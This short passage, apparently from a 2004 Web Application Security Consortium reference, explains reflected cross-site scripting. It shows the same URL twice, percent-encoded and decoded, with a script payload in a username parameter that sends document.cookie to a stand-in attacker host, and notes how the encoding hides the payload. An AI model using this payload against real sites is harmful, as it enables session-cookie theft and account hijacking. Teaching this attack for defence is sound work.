URL-encoded example of a cookie-stealing URL:
http://portal.example/index.php?sessionid=12312312&username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
Decoded example of the same cookie-stealing URL:
http://portal.example/index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
The percent-encoding only disguises the payload in the link; the server decodes the username parameter before reflecting it into the page, so the victim's browser receives the script tag verbatim and sends its cookies to attackerhost.example.
Copyright 2004, Web Application Security Consortium. All rights reserved.